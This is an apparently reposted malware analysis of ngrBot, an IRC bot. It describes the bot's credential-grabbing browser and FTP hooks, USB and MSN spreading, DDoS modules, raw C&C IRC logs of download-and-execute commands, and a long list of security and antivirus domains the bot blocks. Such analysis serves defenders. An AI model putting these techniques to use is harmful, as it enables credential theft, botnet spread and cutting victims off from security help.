Analysis of ngrBot

8419阅读 0评论2011-09-09 a1234567mdy
分类:网络与安全


04
AUG
2011
Analysis of ngrBot
Written by Kimberly

Table of contents
« Prev  
stopmalvertising.com
Today we will have a closer look at ngrBot, an IRC bot with rootkit capabilities. The core of ngrBot is an advanced ring3 (usermode) system-wide injection and hooking engine similar to ZeuS and SpyEye.

NgrBot will inject code into almost every running process on the computer and is able to terminate processes. It will install to the user’s Application Data folder under a randomly generated filename using the HDD serial number as the initial key.

The bot is also able to block access to certain domains and redirect domains / IP’s to others.

It’s able to spread via USB devices and Windows Live Messenger. More recently ngrBot has been spotted on Facebook but also on Twitter, using the micro blogging service to spread itself.


Modules and FeaturesRootkit

The rootkit module will attempt to hide the bot’s registry startup key as well as the bot file.

Ruskill

The Ruskill module will, if enabled for a download command, monitor the downloaded file as it executes. Ruskill will flag any files that it copies itself to or creates to be deleted at the next system reboot.

Proactive defense

The PDef module is an advanced threat detection and removal system. It monitors a range of file and networking API’s to detect and neutralize other threats that are running on the system. Currently this module can detect, block and remove malware that spreads via USB drives, browser exploit packs, and bots that use IRC to communicate.

DNS Modifier

This module can block domains from being accessed and redirect domains/IP addresses to others.

Slowloris

This module is for web servers running Apache HTTPd. It’s designed to use low bandwidth and to maintain connections as long as possible, thus consuming all available resources.

Syn Flood

The syn flood module is good for web servers that Slowloris fails to take down.

UDP Flood

This module is ideal for taking home connections offline.

Internet Explorer Login Grabber

This module hooks wininet.dll and analyses POST requests made by the IE web browser to capture usernames and passwords on the fly.

Firefox Login Grabber

This module hooks nspr4.dll and analyses POST requests made by the Firefox web browser to capture usernames and passwords on the fly.

FTP Login Grabber

This module hooks ws2_32!send to grab the FTP logins as they are used.

USB Spreader

Waits for USB devices to be inserted and then attemps to infect them using multiple .lnk methods and obfuscated autorun.

MSN Spreader

This module hooks ws2_32!send to detect MSN messages being send. It will then monitor outgoing messages and wait for the spoofed number of messages to be sent before replacing one with the set spread message. It has been tested with the msnp10 and msnp21 protocols with msnmsgr.exe, wlcomm.exe, pidgin.exe and msmsgs.exe.


Commands
  • Download
  • Update
  • Die
  • Remove
  • Mute
  • Version
  • Visit
  • Reconnect
  • Join Channel
  • Part Channel
  • Sort Channel by country
  • Unsort
  • Module toggle (enable/disable modules)
  • Statistics (Spreading/login grabbing)
  • Retrieve all cached logs
  • Syn
  • UDP
  • Slowloris
  • Stop DDoS
  • Set MSN Inteerval
  • Block/Redirect Domain and IP Address

The full package containing all the modules is sold for $400. NgrBot can also be obtained a la carte, meaning no modules, pick and choose which modules you want to include.


Analysis of ngrBot

Upon execution facebook-pic0008422012.exe copies itself under a random name based on the HDD serial number (vgbkbf.exe in our analysis), using Kernel32.GetVolumeInformationW, to the C:\Documents and Settings\[username]\Application Data\ folder.

Analysis of ngrBot

Analysis of ngrBot

The newly created process vgbkbf.exe will attempt to inject code into the memory space of all running processes.

Analysis of ngrBot

NgrBot will initiate a communication with its C&C located at update.jebac.net through IRC. The domain api.wipmania.com is used to retrieve the country code based on the victim’s IP. The HTTP / MSN spread message followed by a link to the binary is transmitted via IRC and Instructions are given to download a list of blocked domains from data.fuskbugg.se and a new binary called milkway.exe (saved as 1.tmp) from RapidShare. The bot will report back to the C&C if the download was succesful or not and if the file was executed.

00.PASS ngrBot
01.NICK n{Country Code|XPu}[redacted]
02.USER [redacted] 0 0 :[redacted]
03.:001 get.lost
04.002 002 002
05.003 003 003
06.004 004 004
07.005 005 005
08.005 005 005
09.005 005 005
10.PING 422 MOTD
11.JOIN #!hot! ngrBot
12.:n{Country Code|XPu}[redacted]![redacted]@[redacted] JOIN :#!hot!
13.:get.lost 332 n{Country Code|XPu}[redacted] #!hot! :.http.int 5 .http.set is this you? HAHAHAH .msn.int 4 .msn.set LOL .mdns -n
14.:get.lost 333 n{Country Code|XPu}[redacted] #!hot! x 1312388577
15.PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
16.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
17.PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "is this you? HAHAHAH "
18.PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "4"
19.PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL "
20.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
21.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
22.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
23.PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)
24.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
25.PING :get.lost
26.PONG :get.lost
27.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
28.PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\1.tmp" - Download retries: 1
29.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

The file 1.tmp will request internet access in order to download a binary called memory.exe from RapidShare. The file will be saved under a random name in the %temp% folder.

Analysis of ngrBot

Upon execution the file copies itself as windows.exe to the C:\Documents and Settings\[username]\Application Data\ folder.

Analysis of ngrBot

Once windows.exe started, ngrBot marks its presence in the infected system with a mutex named hex-Mutex and WeAreWeAre.

Analysis of ngrBot

The Internet Explorer Home page has been modified to redirecturls.info which redirects to another domain.

Analysis of ngrBot

Examples are:

NgrBot will periodically download milkway.exe and memory.exe from RapidShare in order to always run the latest version of the bot.

00.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
01.PRIVMSG #!hot! :[d="" s="118784 bytes"] Error creating process "C:\Documents and Settings\[UserName]\Application Data\2.tmp" [e="6"]
02.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
03. 
04.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
05.PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\3.tmp" - Download retries: 1
06.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
07. 
08.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
09.PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\5.tmp" - Download retries: 1
10.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
11. 
12.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
13.PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\8.tmp" - Download retries: 0
14.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
15. 
16.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
17.PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\9.tmp" - Download retries: 1
18.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
19. 
20.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
21.PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\24.tmp" - Download retries: 1
22.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
23. 
24.:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
25.PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\25.tmp" - Download retries: 0
26.:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

Analysis of ngrBot

List of blocked domains

dnl-cd14.kaspersky-labs.com | dnl-kr14.kaspersky-labs.com | download657.avast.com | dl3.antivir-pe.com | sophos3.ucd.ie | updates1.kaspersky-labs.com | diamondcs.fileburst.com | bitdefender.fr | sophos4.ucd.ie | updates2.kaspersky-labs.com | dispatch.mcafee.com | bkav.com.vn | sophos5.ucd.ie | updates3.kaspersky-labs.com | blackice.iss.net | sophos6.ucd.ie | updates4.kaspersky-labs.com | dl1.antivir.de | ca.com | avg.de | | download.microsoft.com | go.microsoft.com | msdn.microsoft.com | office.microsoft.com | windowsupdate.microsoft.com | avp.ru | kaspersky.ru | kaspersky.com | kaspersky-labs.com | downloads1.kaspersky-labs.com | downloads2.kaspersky-labs.com | downloads3.kaspersky-labs.com | downloads4.kaspersky-labs.com | downloads5.kaspersky-labs.com | viruslist.com | viruslist.ru | symantec.com | customer.symantec.com | liveupdate.symantec.com | liveupdate.symantecliveupdate.com | securityresponse.symantec.com | service1.symantec.com | updates.symantec.com | ad.doubleclick.net | ad.fastclick.net | ads.fastclick.net | ar.atwola.com | atdmt.com | avp.ch | avp.com | awaps.net | banner.fastclick.net | banners.fastclick.net | click.atdmt.com | clicks.atdmt.com | download.mcafee.com | downloads.microsoft.com | engine.awaps.net | fastclick.net | f-secure.com | ftp.f-secure.com | ftp.sophos.com | mast.mcafee.com | mcafee.com | media.fastclick.net | my-etrust.com | nai.com | networkassociates.com | phx.corporate-ir.net | secure.nai.com | sophos.com | spd.atdmt.com | support.microsoft.com | update.symantec.com | us.mcafee.com | vil.nai.com | trendmicro.com | us.trendmicro.com | www3.ca.com | ids.kaspersky-labs.com | rads.mcafee.com | grisoft.com | avira.com | bitdefender.com | dl2.antivir.de | dl3.antivir.de | dl4.antivir.de | downloads-us1.kaspersky-labs.com | downloads-us2.kaspersky-labs.com | downloads-us3.kaspersky-labs.com | drweb.com | eset.com | esetindia.com | free-av.com | ftp.downloads2.kaspersky-labs.com | ftp.kasperskylab.ru | microsoft.com | updates5.kaspersky-labs.com | virusscan.jotti.org | virustotal.com | update.ikaka.com | msnfix.changelog.fr | incodesolutions.com | virusinfo.prevx.com | download.bleepingcomputer.com | dazhizhu.cn | foro.noticias3d.com | nabble.com | lurker.clamav.net | lexikon.ikarus.at | research.sunbelt-software.com | virusdoctor.jp | elitepvpers.de | guru.avg.com | superuser.co.kr | ntfaq.co.kr | v.dreamwiz.com | cit.kookmin.ac.kr | forums.whatthetech.com | forum.hijackthis.de | avg.vo.llnwd.net | huaifai.go.th | mostz.com | krupunmai.com | cddchiangmai.net | forum.malekal.com | tech.pantip.com | sapcupgrades.com | 247fixes.com | forum.sysinternals.com | forum.telecharger.01net.com | foros.softonic.com | avast-home.uptodown.com | dr-web-cureit.softonic.com | chkrootkit.org | diamondcs.com.au | rootkit.nl | sysinternals.com | z-oleg.com | espanol.dir.groups.yahoo.com | castlecrops.com | misec.net | safecomputing.umn.edu | antirootkit.com | greatis.com | ar.answers.yahoo.com | elhacker.org | rootkit.com | pctools.com | pcsupportadvisor.com | resplendence.com | personal.psu.edu | foro.ethek.com | foro.elhacker.net | vil.nail.com | search.mcafee.com | wmcafee.com | download.nai.com | wexperts-exchange.com | bakunos.com | darkclockers.com | Merijn.org | spywareinfo.com | spybot.info | hijackthis.de | forum.kaspersky.com | majorgeeks.com | linhadefensiva.uol.com.br | cmmings.cn | sergiwa.com | el-hacker.com | avg-antivirus.net | bleepingcomputer.com | free.grisoft.com | alerta-antivirus.inteco.es | analysis.seclab.tuwien.ac.at | kztechs.com | ad-aware-se.uptodown.com | stdio-labs.blogspot.com | box.net | foro.el-hacker.com | free.avg.com | tecno-soft.com | ladooscuro.es | ftp.drweb.com | download.microsoft.comguru0.grisoft.cz | guru1.grisoft.cz | guru2.grisoft.cz | guru3.grisoft.cz | it.answers.yahoo.com | softonic.com | guru4.grisoft.cz | guru5.grisoft.cz | virusspy.com | download.f-secure.com | malwareremoval.com | forums.cnet.com | hjt-data.trend-braintree.com | pantip.com | secubox.aldria.com | forospyware.com | manuelruvalcaba.com | zonavirus.com | leforo.com | siteadvisor.com | blog.threatfire.com | threatexpert.com | blog.hispasec.com | configurarequipos.com | sosvirus.changelog.fr | psicofxp.com | mailcenter.rising.com.cn | mailcenter.rising.com | rising.com.cn | rising.com | babooforum.com.br | runscanner.net | blogschapines.com | upload.changelog.fr | raymond.cc | changelog.fr | pcentraide.com | atazita.blogspot.com | thinkpad.cn | final4ever.com | files.filefont.com | infos-du-net.com | trendsecure.com | forum.hardware.fr | utilidades-utiles.com | blogs.icerocket.com | spychecker.com | geekstogo.com | forums.maddoktor2.com | smokey-services.eu | clubic.com | linhadefensiva.org | rolandovera.com | download.sysinternals.com | pcguide.com | thetechguide.com | ozzu.com | changedetection.com | espanol.groups.yahoo.com | sunbeltsecurity.com | community.thaiware.com | avpclub.ddns.info | offensivecomputing.net | boardreader.com | guiadohardware.net | msnvirusremoval.com | cisrt.org | fixmyim.com | samroeng.hi5.com | daboweb.com | forums.techguy.org | hijackthis.download3000.com | cybertechhelp.com | superdicas.com.br | 51nb.com | downloads.andymanchesta.com | andymanchesta.com | info.prevx.com | aknow.prevx.com | securitywonks.net | yoreparo.com | lavasoft.com | virscan.org | eeload.com | file.net | onecare.live.com | mvps.org | laneros.com | housecall.trendmicro.com | avast.com | onlinescan.avast.com | ewido.net | trucoswindows.net | mozilla-hispano.org | futurenow.bitdefender.com | f-prot.com | security.symantec.com | oldtimer.geekstogo.com | kr.ahnlab.com | thejokerx.blogspot.com | 2-spyware.com | antivir.es | prevx.com | ikarus.net | bbs.s-sos.net | forums.majorgeeks.com | castlecops.com | kaspersky.es | subs.geekstogo.com | forospanish.com | fortinet.com | safer-networking.org | fortiguardcenter.com | dougknox.com | vsantivirus.com | firewallguide.com | auditmypc.com | spywaredb.com | mxttchina.com | ziggamza.net | forospyware.es | pogonyuto.forospanish.com | antivirus.comodo.com | spywareterminator.com | eradicatespyware.net | freespywareremoval.info | personalfirewall.comodo.com | clamav.net | clamwin.com | antivirus.about.com | pandasecurity.com | webphand.com | mx.answers.yahoo.com | sandboxie.com | clamwin.com | cwsandbox.org | arswp.com | es.answers.yahoo.com | trucoswindows.es | networkworld.com | norman.com | espanol.answers.yahoo.com | tallemu.com | viruschief.com | scanner.virus.org | housecall65.trendmicro.com | hjt.networktechs.com | techsupportforum.com | whatthetech.com | soccersuck.com | comunidad.wilkinsonpc.com.co | forum.piriform.com | tweaksforgeeks.com | daniweb.com | pchell.com | spyany.com | experts-exchange.com | wikio.es | forums.devshed.com | forum.tweaks.com | wilderssecurity.com | techspot.com | thecomputerpitstop.com | es.wasalive.com | secunia.com | es.kioskea.net | taringa.net | cyberdefender.com | feedage.com | new.taringa.net | forum.zazana.com | forum.clubedohardware.com.br | computing.net | discussions.virtualdr.com | forum.securitycadets.com | techimo.com | 13iii.com | dicasweb.com.br | infosecpodcast.com | usbcleaner.cn | net-security.org | bleedingthreats.net | acs.pandasoftware.com | funkytoad.com | 360safe.cn | 360safe.com | bbs.360safe.cn | bbs.360safe.com | codehard.wordpress.com | 360.cn | 360.com | p3dev.taringa.net | precisesecurity.com | baike.360.cn | baike.360.com | kaba.360.cn | kaba.360.com | deckard.geekstogo.com | forums.comodo.com | down.360safe.cn | down.360safe.com | x.360safe.com | dl.360safe.com | hotshare.net | free.antivirus.com | updatem.360safe.com | updatem.360safe.cn | update.360safe.cn | update.360safe.com | bbs.duba.net | duba.net | zhidao.baidu.com | hi.baidu.com | drweb.com.es | msncleaner.softonic.com | javacoolsoftware.com | file.ikaka.com | file.ikaka.cn | bbs.ikaka.com | zhidao.ikaka.com | eset-la.com | software-files.download.com | ikaka.com | ikaka.cn | bbs.cfan.com.cn | cfan.com.cn | es.mcafee.com | downloads.malwarebytes.org | bbs.kafan.cn | bbs.kafan.com | bbs.kpfans.com | bbs.taisha.org | support.f-secure.com | bbs.winzheng.com | foros.zonavirus.com | alerta-antivirus.red.es | malwarebytes.org | commentcamarche.net | infospyware.com | bitdefender.es | foros.toxico-pc.com | emsisoft.de | securitynewsportal.com | secuser.com | a188.x.akamai.net | liveupdate.symantec.d4p.net | ftp.nai.com | grisoft.cz | free.grisoft.cz | tds.diamondcs.com.au | ieupdate.gdata.de | ieupdate6.gdata.de | ieupdate5.gdata.de | ieupdate4.gdata.de | ieupdate3.gdata.de | ieupdate2.gdata.de | ieupdate1.gdata.de | iavs.cz | download7.avast.com | download6.avast.com | download5.avast.com | download4.avast.com | download3.avast.com | download2.avast.com | download1.avast.com | upgrade.bitdefender.com | lavasoftusa.com | a-2.org | updates.a-2.org | niuone.norman.no | attechnical.com | zeylstra.nl | fractus.mat.uson.mx | toonbox.de | radius.turvamies.com | downloads.My-eTrust.com | v4.windowsupdate.microsoft.com | v5.windowsupdate.microsoft.com | NoAdware.net | nod32.com | nod32.de | nod32.ch | nod32.nl | nod32.com.au | nod32.nankai.edu.cn | eset.co.th | nod32adria.com | update.eset.com | nod32.smartantivirus.ca | | gxrg.org | eset.sk | avu.zonelabs.com | retail.sp.f-secure.com | retail01.sp.f-secure.com | retail02.sp.f-secure.com | moosoft.com | secuser.model-fx.com | viruslab.ca | downloads-eu1.kaspersky-labs.com | pccreg.antivirus.com | updates.sald.com | k-otik.com | megasecurity.org | fr.mcafee.com | antivirus.cai.com | pandasoftware.com | securitoo.com | Kaspersky-FR.com | thaikaspersky.com | kavkisfile.com | avgfrance.com | antivirus-online.de | ftp.esafe.com | ftp.microworldsystems.com | ftp.europe.f-secure.com | ftp.ca.co | ftp.symantec.com | files.trendmicro-europe.com | akamai.net | inline-software.de | ravantivirus.com | drsolomon.com | openantivirus.org | pandasoftware.es | dialognauka.ru | viguard.com | nod32.lu | zonelabs.fr | anti-virus-software-review.com | vet.com.au | eicar.org | anti-virus.com | microsoft.fr | trendmicro.fr | fr.bitdefender.com | sophos.fr | nsclean.com | antiviraldp.com | pestpatrol.com | agnitum.com | simplysup.com | centralcommand.com | www1.my-etrust.com | authentium.com | finjan.com | psnw.com | gwava.nl | gecadsoftware.com | pspl.com | safetynet.com | stiller.com | sybari.com | wildlist.com | mcaffee.com | antivirus.nmt.edu | buymcafeenow.com | deerfield.com | kerio.com | looknstop.com | mcafee-at-home.com | sygate.com | tinysoftware.com | visualizesoftware.com | zonelabs.com | zonelog.co.uk | webroot.com | lavasoft.nu | spywareguide.com | aluriasoftware.com | spyblocker-software.com | spycop.com | wilderssecurity.net | trapware.com | winpatrol.com | liutilities.com | x-cleaner.com | shop.symantec.com | kaspersky.co.uk | housecall.com | sophos7.ucd.ie | dl1.antivir-pe.com | sophos8.ucd.ie | dl1.antivir-pe.de | sophos9.ucd.ie | dl1.avgate.net | sos.rising.com.cn | dl10.freeav.net | spftrl.digitalriver.com | store.digitalriver.com | stats.norton.com | dl2.antivir-pe.com | sucop.com | dl2.antivir-pe.de | sunbeltsoftware.com | dl2.avgate.net | download.com | sunbelt-software.com | vrv.com.cn | download.com.vn | dl3.antivir-pe.de | symantec-ese.baynote.net | dl3.avgate.net | u19.eset.com | u38.eset.com | mmsk.cn | u91.eset.com | eset.ro | download516.avast.com | avastedition.com | | 9down.com | dl7.avgate.net | u63.eset.com | dnl-ru1.kaspersky-labs.com | tool.ikaka.com | moneybookers.com | eset.nl | u25.eset.com | u98.eset.com | download925.avast.com | download94.avast.com | download.cnet.com | kaspersky.ca | bbs.kaspersky.com.cn | download926.avast.com | download940.avast.com | bbs.mcafeefans.com | download927.avast.com | download941.avast.com | bbs.sucop.com | download928.avast.com | download942.avast.com | bbs.trendmicro.com.cn | download929.avast.com | download943.avast.com | download93.avast.com | download944.avast.com | bitdefender.de | bitdefender.com.ua | download930.avast.com | download945.avast.com | download931.avast.com | download946.avast.com | buddy.bitdefender.com | download932.avast.com | download947.avast.com | buy.rising.com.cn | download933.avast.com | download948.avast.com | download934.avast.com | download949.avast.com | cdn.atwola.com | download935.avast.com | download95.avast.com | center.rising.com.cn | download936.avast.com | download950.avast.com | cert.org | download937.avast.com | download951.avast.com | download938.avast.com | download952.avast.com | download939.avast.com | download953.avast.com | download954.avast.com | download955.avast.com | cn.mcafee.com | download956.avast.com | download957.avast.com | cn.trendmicro.com | download958.avast.com | download959.avast.com | comodo.com | download96.avast.com | download960.avast.com | coresecurity.com | download961.avast.com | download962.avast.com | cpsecure.com | download963.avast.com | download964.avast.com | csc.rising.com.cn | download965.avast.com | download966.avast.com | download967.avast.com | download968.avast.com | download969.avast.com | download97.avast.com | download970.avast.com | download971.avast.com | dl4.antivir-pe.com | download972.avast.com | download973.avast.com | dl4.antivir-pe.de | download974.avast.com | download975.avast.com | dl4.avgate.net | download976.avast.com | download977.avast.com | dl5.avgate.net | download978.avast.com | download979.avast.com | dl6.avgate.net | download98.avast.com | download980.avast.com | dl8.avgate.net | download99.avast.com | dl8.freeav.net | dl9.avgate.net | dl9.freeav.net | kaspersky.it | dnl-cd1.kaspersky-labs.com | dnl-cd10.kaspersky-labs.com | dswlab.com | eeye.com | dnl-cd11.kaspersky-labs.com | emsisoft.com | dnl-cd12.kaspersky-labs.com | esafe.com | download684.avast.com | dnl-cd4.kaspersky-labs.com | downloads-eu2.kaspersky-labs.com | dnl-us9.kaspersky-labs.com | download649.avast.com | dnl-cn15.kaspersky-labs.com | download618.avast.com | download695.avast.com | download603.avast.com | download685.avast.com | avast.it | dnl-cd5.kaspersky-labs.com | downloads-eu3.kaspersky-labs.com | download.avg.com | akamai.avg.com.edgesuite.net | akamai.grisoft.com.edgesuite.net | akamai.avg.com | akamai.grisoft.com | akamai.avg.cz.edgesuite.net | akamai.avg.cz | akamai.grisoft.cz.edgesuite.net | akamai.grisoft.cz | download.avg.cz | backup.grisoft.cz | backup.avg.cz | download650.avast.com | download619.avast.com | fw.rising.com.cn | shudoo.com | download696.avast.com | download604.avast.com | download686.avast.com | dnl-cd6.kaspersky-labs.com | downloads-eu4.kaspersky-labs.com | download651.avast.com | download620.avast.com | fx.dk | download697.avast.com | bbs.janmeng.com | download605.avast.com | download687.avast.com | dnl-cd7.kaspersky-labs.com | download.eset.com | eset.fi | download652.avast.com | download621.avast.com | gdata.de | download698.avast.com | dnl-cd13.kaspersky-labs.com | download606.avast.com | download688.avast.com | filseclab.com | dnl-cd8.kaspersky-labs.com | download653.avast.com | download622.avast.com | download699.avast.com | dnl-cd2.kaspersky-labs.com | download607.avast.com | download689.avast.com | dnl-cd9.kaspersky-labs.com | download654.avast.com | download623.avast.com | go.rising.com.cn | dnl-cd3.kaspersky-labs.com | download608.avast.com | download690.avast.com | forum.ikaka.com | dnl-cn1.kaspersky-labs.com | downloads-us4.kaspersky-labs.com | download.norman.no | download655.avast.com | download624.avast.com | download7.quickheal.com | dnl-cn10.kaspersky-labs.com | download609.avast.com | download691.avast.com | forum.jiangmin.com | dnl-cn11.kaspersky-labs.com | sandbox.norman.com | download.rising.com.cn | download656.avast.com | download625.avast.com | download700.avast.com | dnl-cn12.kaspersky-labs.com | download617.avast.com | download692.avast.com | dnl-cn13.kaspersky-labs.com | scanner.novirusthanks.org | ftp.updates1.kaspersky-labs.com | fr.drweb.com | download.softpedia.com | u2.eset.com | u56.eset.com | ftp.updates2.kaspersky-labs.com | download0.avast.com | u20.eset.com | u57.eset.com | ftp.updates3.kaspersky-labs.com | fr1.drweb.com | u21.eset.com | u58.eset.com | ftp.updates4.kaspersky-labs.com | fr2.drweb.com | download1.quickheal.com | u22.eset.com | u59.eset.com | ftp.us.mcafee.com | fr3.drweb.com | download10.quickheal.com | u23.eset.com | u6.eset.com | ftp.viruslist.com | fr4.drweb.com | download100.avast.com | bitdefender.secyber.net | u24.eset.com | u60.eset.com | fr5.drweb.com | download1us.softpedia.com | u26.eset.com | u61.eset.com | fr6.drweb.com | u27.eset.com | u62.eset.com | symantecliveupdate.com | fr7.drweb.com | download2.quickheal.com | u28.eset.com | u64.eset.com | symatec.com | download200.avast.com | u29.eset.com | u65.eset.com | hacksoft.com.pe | download201.avast.com | u3.eset.com | u66.eset.com | hauri.net | download202.avast.com | u30.eset.com | u67.eset.com | help.rising.com.cn | download203.avast.com | u31.eset.com | u68.eset.com | freeav.com | download204.avast.com | u32.eset.com | u69.eset.com | trendmicro.com.cn | download205.avast.com | u33.eset.com | u7.eset.com | ikarus.at | freeav.net | download206.avast.com | iss.net | u34.eset.com | u70.eset.com | uk.trendmicro-europe.com | jetico.com | free-av.net | download207.avast.com | k7computing.com | u35.eset.com | u71.eset.com | ftp.avp.com | download641.avast.com | download920.avast.com | dnl-kr7.kaspersky-labs.com | kaspersky.gr | anti-virus.by | ftp.bitdefender.com | update.sophos.com | dnl-us5.kaspersky-labs.com | JUSTFACEBOOK.NET | download214.avast.com | download81.avast.com | mcafeefans.com | mirror02.gdata.de | msk.drweb.com | msk1.drweb.com | msk2.drweb.com | msk3.drweb.com | msk4.drweb.com | msk5.drweb.com | msk6.drweb.com | msk7.drweb.com | niueight.norman.no | niufive.norman.no | niufour.norman.no | niunine.norman.no | niuseven.norman.no | niusix.norman.no | niuthree.norman.no | niutwo.norman.no | nod32.co.uk | nod32.datsec.de | nod32.ru | norton.com | notifier.antivir-pe.de | online.jiangmin.com | online.rising.com.cn | outpost.pl | pccreg.trendmicro.com | pcinternetpatrol.com | quickheal.co.in | reg.rising.com.cn | renewalcenter.symantec.com | safe.qq.com | scan.kingsoft.com | secdreg.org | securecomputing.com | shadow.grisoft.cz | shadu.baidu.com | shadu.duba.net | sophos1.ucd.ie | sophos10.ucd.ie | sophos2.ucd.ie | u0.eset.com | u1.eset.com | u10.eset.com | u100.eset.com | u11.eset.com | u12.eset.com | u13.eset.com | u36.eset.com | u78.eset.com | kaspersky.co.jp | download211.avast.com | kpfans.com | download208.avast.com | dnl-cn14.kaspersky-labs.com | download659.avast.com | ftp.ca.com | download693.avast.com | dnl-us2.kaspersky-labs.com | u36eset.com | u79.eset.com | download212.avast.com | kvup.jiangmin.com | download209.avast.com | download660.avast.com | ftp.customer.symantec.com | download694.avast.com | dnl-us3.kaspersky-labs.com | kaspersky.com.cn | kaspersky.de | eset.co.uk | u37.eset.com | u8.eset.com | kaspersky.dk | download213.avast.com | download210.avast.com | download661.avast.com | ftp.dispatch.mcafee.com | download701.avast.com | dnl-us4.kaspersky-labs.com | kaspersky.pl | eset.at | u37eset.com | u80.eset.com | download3.quickheal.com | download662.avast.com | ftp.download.mcafee.com | download702.avast.com | dnl-us6.kaspersky-labs.com | kaspersky.se | u39.eset.com | u81.eset.com | kasperskylab.co.kr | download4.quickheal.com | download663.avast.com | ftp.downloads1.kaspersky-labs.com | download703.avast.com | dnl-us7.kaspersky-labs.com | kasperskylab.nl | u4.eset.com | u82.eset.com | download5.quickheal.com | download664.avast.com | download704.avast.com | dnl-us8.kaspersky-labs.com | kav.ru | u40.eset.com | u83.eset.com | kav.zonelabs.com | download501.avast.com | malwaredomainlist.com | download502.avast.com | download665.avast.com | ftp.downloads3.kaspersky-labs.com | download705.avast.com | download503.avast.com | kb.bitdefender.com | u41.eset.com | u84.eset.com | download504.avast.com | download505.avast.com | download666.avast.com | ftp.downloads4.kaspersky-labs.com | download706.avast.com | download511.avast.com | u42.eset.com | u85.eset.com | u14.eset.com | download512.avast.com | u15.eset.com | ftp.downloads-eu1.kaspersky-labs.com | download82.avast.com | ftp.downloads-eu2.kaspersky-labs.com | download658.avast.com | download513.avast.com | zeustracker.abuse.ch | dnl-us11.kaspersky-labs.com | ftp.downloads-eu3.kaspersky-labs.com | download75.avast.com | u43.eset.com | download626.avast.com | download514.avast.com | ftp.downloads-eu4.kaspersky-labs.com | download667.avast.com | download515.avast.com | zonealarm.com | dnl-us12.kaspersky-labs.com | ftp.downloads-us1.kaspersky-labs.com | download76.avast.com | zs.kingsoft.com | u44.eset.com | download627.avast.com | ftp.downloads-us2.kaspersky-labs.com | download668.avast.com | download6.quickheal.com | bitcity.info | dnl-us13.kaspersky-labs.com | ftp.downloads-us3.kaspersky-labs.com | download77.avast.com | bitcity.org | u45.eset.com | download628.avast.com | download600.avast.com | ftp.downloads-us4.kaspersky-labs.com | download669.avast.com | download601.avast.com | ilove.tigolbittys.info | dnl-us14.kaspersky-labs.com | download78.avast.com | ulove.tigolbittys.info | u46.eset.com | download629.avast.com | download602.avast.com | download670.avast.com | download630.avast.com | free.tinypicbox.com | dnl-us15.kaspersky-labs.com | ftp.f-prot.com | download79.avast.com | one.tinypicbox.com | u47.eset.com | download631.avast.com | download632.avast.com | download671.avast.com | download633.avast.com | gangbang.mytijn.org | download634.avast.com | ftp.grisoft.com | download8.quickheal.com | irc.bigshitsandwich.org | u48.eset.com | download635.avast.com | download636.avast.com | ftp.kaspersky.com | download672.avast.com | download637.avast.com | l33t.shadow-mods.net | download638.avast.com | ftp.kaspersky-labs.com | download80.avast.com | irc.metraiciono.com | u49.eset.com | download639.avast.com | download640.avast.com | ftp.liveupdate.symantec.com | download673.avast.com | download642.avast.com | download643.avast.com | ftp.liveupdate.symantecliveupdate.com | download83.avast.com | lovings.technigoyous.net | u5.eset.com | download644.avast.com | download645.avast.com | ftp.mast.mcafee.com | download674.avast.com | download646.avast.com | download647.avast.com | ftp.mcafee.com | download84.avast.com | u50.eset.com | download648.avast.com | download675.avast.com | download676.avast.com | download677.avast.com | download678.avast.com | ftp.my-etrust.com | download85.avast.com | u51.eset.com | download679.avast.com | download680.avast.com | download681.avast.com | download682.avast.com | download683.avast.com | ftp.networkassociates.com | download9.quickheal.com | u52.eset.com | download707.avast.com | u53.eset.com | download922.avast.com | ftp.norton.com | ftp.rads.mcafee.com | ftp.sandbox.norman.com | dnl-ru13.kaspersky-labs.com | u54.eset.com | download923.avast.com | ftp.secure.nai.com | 